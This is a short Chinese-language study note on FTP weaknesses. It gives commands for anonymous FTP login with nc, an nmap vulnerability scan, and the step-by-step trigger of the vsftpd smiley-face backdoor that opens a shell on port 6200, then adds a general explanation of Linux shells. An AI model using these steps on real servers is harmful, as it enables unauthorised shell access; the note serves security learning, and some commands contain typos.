学习笔记 第一篇章有关于FTP的漏洞

1.FTP协议
2.FTP匿名登录漏洞
3.利用FTP后门漏洞
4.FTP安全配置
----------------------------------------------------------------------------------------------------------------------------------
FTP为文件传输协议 是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式.它属于网络传输协议的应用层
.FTP使用21号端口.

Anoymous用户的使用:

1.Real用户
2.Administrator用户
3.匿名用户
---------------------->

nc 192.168.1.10 21
连接 ..... 开放的21号端口

USER anonymous
使用anonymous用户

PASS 123
密码随意

nmap --script vuln -p 21 192.168.1.10
扫描21号

vsftpd手动触发漏洞,当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell

shell为Linux脚本.

netdisscover -r 192.168.1.10/24

nc 192.168.1.10 21
21号端口

nmap -p 端口号 192.168.1.10
扫描

USER user:)

PASS pass

nmap -p 6200 192.168.1.10

ifconfig

中间说的shell命令脚本

Shell 是一个用 C 语言编写的程序，它是用户使用 Linux 的桥梁。Shell 既是一种命令语言，又是一种程序设计语言。

Shell 是指一种应用程序，这个应用程序提供了一个界面，用户通过这个界面访问操作系统内核的服务。

Ken Thompson 的 sh 是第一种 Unix Shell，Windows Explorer 是一个典型的图形界面 Shell。

 

Shell 脚本（shell script），是一种为 shell 编写的脚本程序。

业界所说的 shell 通常都是指 shell 脚本，但读者朋友要知道，shell 和 shell script 是两个不同的概念。

由于习惯的原因，简洁起见，本文出现的 "shell编程" 都是指 shell 脚本编程，不是指开发 shell 自身。